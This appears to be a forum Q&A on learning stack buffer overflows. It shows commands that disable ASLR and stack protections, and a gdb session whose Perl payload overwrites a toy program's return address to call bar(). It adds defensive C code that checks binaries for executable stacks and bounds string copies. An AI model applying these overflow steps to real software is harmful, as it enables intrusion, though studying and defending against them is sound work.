Problem description

I'm currently interested in learning how to do buffer overflows. I've done quite a bit of assembly, and understand how the stack works and how to implement a buffer overflow in C. However, I'm running across quite a bit of trouble trying to get GCC 4.9.1 to allow me to overflow a buffer properly. I'm running Debian Jessie.

Here is the tutorial that I'm attempting to follow, in section 2.2. I've copy/pasted the C program he provides, and I'm using the same Perl script that he is, so everything is the exact same as his case (except the system, of course).

These are the results that I'm getting consistently:

 ~/projects/buffer-overflow$ ls
 run.pl  test.c
 ~/projects/buffer-overflow$ sudo su 
 root@wash# echo "0" > /proc/sys/kernel/randomize_va_space 
 root@wash# exit
 exit
 ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c 
 ~/projects/buffer-overflow$ ./run.pl 
 Address of foo = 0x804845b
 Address of bar = 0x80484a4
 My stack looks like:
 (nil)
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x8048657
 0xffffd494

 ABCDEFGHIJKLMNOPP@
 Now the stack looks like:
 0xffffd718
 0xffffd4a8
 0xf7e58b2f
 0xf7fb3ac0
 0x42418657
 0x46454443
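The question turns on three protections being switched off before the overflow "works": ASLR (`randomize_va_space`), the stack protector (`-fno-stack-protector`) and the non-executable stack (`-zexecstack`). The last of these is recorded in the binary itself, in the `PT_GNU_STACK` program header, so it can be audited after the fact. The following checker is an added example, not code from the question, the answer or the tutorial they follow: it walks a little-endian ELF32 or ELF64 image, bounds-checking every offset, and reports whether the stack segment was linked executable. The sample images it builds for itself are constructed test data, not real binaries, and the `main` and function names are assumptions of this example.

```c
/* Added example, not code from the original post or its tutorial: decide from
 * an ELF image's PT_GNU_STACK program header whether the binary was linked
 * with an executable stack (what the "-z execstack" flag on the page asks
 * for) or with the default non-executable stack.  Handles little-endian
 * ELF32 and ELF64, so it covers both -m32 and native x86-64 builds. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u  /* p_type GNU linkers use to record stack permissions */
#define PT_LOAD      0x1u
#define PF_X         0x1u         /* p_flags bit: segment is executable */

enum stack_status {
    STACK_MALFORMED = -2, /* not a little-endian ELF image we can walk safely */
    STACK_NO_HEADER = -1, /* no PT_GNU_STACK entry: the kernel's default applies */
    STACK_NX        =  0, /* PT_GNU_STACK present without PF_X: non-executable */
    STACK_EXEC      =  1  /* PT_GNU_STACK present with PF_X: -z execstack */
};

static uint32_t rd16(const unsigned char *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8; }
static uint32_t rd32(const unsigned char *p) { return rd16(p) | rd16(p + 2) << 16; }
static uint64_t rd64(const unsigned char *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }

/* Walk the program headers of an in-memory ELF image; every offset is
 * checked against len before it is dereferenced. */
int stack_exec_status(const unsigned char *img, size_t len)
{
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1 /* ELFDATA2LSB */)
        return STACK_MALFORMED;
    int is64 = img[4] == 2;                 /* EI_CLASS: 1 = ELF32, 2 = ELF64 */
    uint64_t phoff;
    uint32_t phentsize, phnum, flags_off, min_ent;
    if (is64) {
        if (len < 64) return STACK_MALFORMED;
        phoff = rd64(img + 32); phentsize = rd16(img + 54); phnum = rd16(img + 56);
        flags_off = 4;  min_ent = 56;       /* Elf64_Phdr: p_type, p_flags, p_offset, ... */
    } else {
        phoff = rd32(img + 28); phentsize = rd16(img + 42); phnum = rd16(img + 44);
        flags_off = 24; min_ent = 32;       /* Elf32_Phdr: p_flags follows p_memsz */
    }
    if (phentsize < min_ent || phoff > len) return STACK_MALFORMED;
    for (uint32_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;   /* cannot wrap: phoff <= len */
        if (off > len || len - off < phentsize) return STACK_MALFORMED;
        const unsigned char *ph = img + off;
        if (rd32(ph) == PT_GNU_STACK)
            return (rd32(ph + flags_off) & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HEADER;
}

/* Same check on a file, e.g. the a.out produced by the gcc line on the page. */
int stack_exec_status_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) return STACK_MALFORMED;
    if (fseek(f, 0, SEEK_END) != 0) { fclose(f); return STACK_MALFORMED; }
    long size = ftell(f);
    if (size <= 0 || size > 64L * 1024 * 1024) { fclose(f); return STACK_MALFORMED; }
    rewind(f);
    unsigned char *img = malloc((size_t)size);
    int status = STACK_MALFORMED;
    if (img && fread(img, 1, (size_t)size, f) == (size_t)size)
        status = stack_exec_status(img, (size_t)size);
    free(img);
    fclose(f);
    return status;
}

/* Constructed sample images (not real binaries) so the checker runs offline. */
static void wr16(unsigned char *p, uint32_t v) { p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; }
static void wr32(unsigned char *p, uint32_t v) { wr16(p, v & 0xffff); wr16(p + 2, v >> 16); }

/* Build a minimal little-endian ELF with one program header; returns its size. */
size_t make_sample_elf(unsigned char *out, int is64, uint32_t ptype, uint32_t pflags)
{
    size_t ehsize = is64 ? 64 : 52, phsize = is64 ? 56 : 32;
    memset(out, 0, ehsize + phsize);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = is64 ? 2 : 1; out[5] = 1; out[6] = 1;    /* class, LSB, EV_CURRENT */
    unsigned char *ph = out + ehsize;
    wr32(ph, ptype);
    if (is64) { wr32(out + 32, (uint32_t)ehsize); wr16(out + 54, 56); wr16(out + 56, 1); wr32(ph + 4, pflags); }
    else      { wr32(out + 28, (uint32_t)ehsize); wr16(out + 42, 32); wr16(out + 44, 1); wr32(ph + 24, pflags); }
    return ehsize + phsize;
}

/* Status of a constructed image with the given single program header. */
int sample_status(int is64, uint32_t ptype, uint32_t pflags)
{
    unsigned char img[64 + 56];
    size_t n = make_sample_elf(img, is64, ptype, pflags);
    return stack_exec_status(img, n);
}

int main(int argc, char **argv)
{
    static const char *names[] = { "malformed", "no PT_GNU_STACK (kernel default)",
                                   "non-executable stack", "EXECUTABLE stack (-z execstack)" };
    int status = argc > 1 ? stack_exec_status_file(argv[1])
                          : sample_status(0, PT_GNU_STACK, 7 /* RWE */);
    printf("%s: %s\n", argc > 1 ? argv[1] : "constructed sample", names[status + 2]);
    return status == STACK_EXEC;
}
```

Run it against the `a.out` from the question and it reports an executable stack; rebuild without `-zexecstack` and the same binary reports a non-executable one. A missing `PT_GNU_STACK` entry is reported separately because the decision then falls to the kernel rather than to the binary.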
Solution

That Perl script isn't particularly useful here; different systems will use different addresses, so let's do it without the script...

First of all, find out the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:

(gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

As you can see, 26 bytes will overwrite the EIP, so by replacing the last four "A" characters with our bar() function address (don't forget to put it in little endian format), we should have success:

(gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
 0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141

Augh! I've been hacked!

Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()

As you can see, we successfully returned to function bar().
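The answer shows that 26 bytes of input reach the saved return address, which is only possible because the copy into the stack buffer is unbounded. The following is an added example, not the tutorial's `test.c` (which is not on the page): the unbounded pattern next to a bounded copy that rejects any argument that would not fit, so the 26-byte input from the answer never gets near the return address. The buffer size, the function names and `main` are constructed assumptions of this example.

```c
/* Added example, not the tutorial's test.c: the unsafe copy pattern the page
 * relies on, beside a bounded copy that refuses input which would not fit.
 * The unsafe variant is included for comparison and is never called on
 * oversized input here. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16   /* constructed size; the tutorial's buffer size is not on the page */

/* Unsafe: the caller decides how many bytes land in buf, so input longer than
 * BUF_SIZE - 1 runs past the buffer into the saved frame pointer and return
 * address (the 0x41414141 seen in the answer's gdb session). */
void copy_unbounded(char *buf, const char *input)
{
    strcpy(buf, input);
}

/* Safe: returns 0 on success, -1 when the input plus its NUL would not fit.
 * Nothing is written on failure, so an oversized argument is simply rejected.
 * The length scan stops at bufsize, so a huge input costs no more than a short one. */
int copy_bounded(char *buf, size_t bufsize, const char *input)
{
    size_t n = 0;
    while (n < bufsize && input[n] != '\0')
        n++;
    if (n >= bufsize)          /* n == bufsize: no room for the terminator */
        return -1;
    memcpy(buf, input, n + 1); /* n + 1 <= bufsize, so this cannot overflow */
    return 0;
}

/* Returns 0 if the argument was accepted, 1 if it was rejected as too long. */
int handle_argument(const char *arg)
{
    char buf[BUF_SIZE];
    if (copy_bounded(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "rejected: argument longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("accepted: %s\n", buf);
    return 0;
}

int main(int argc, char **argv)
{
    /* The answer's 26-byte input, rebuilt here as constructed sample data. */
    const char *sample = "AAAAAAAAAAAAAAAAAAAAAAAAAA";
    return handle_argument(argc > 1 ? argv[1] : sample);
}
```

The boundary that matters is `n >= bufsize`: a 15-character argument fills the 16-byte buffer exactly (with its terminator) and is accepted, a 16-character one is refused. Compiling the program with the stack protector and ASLR left enabled adds defence in depth, but the bounded copy is what removes the bug itself.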

10-12 07:54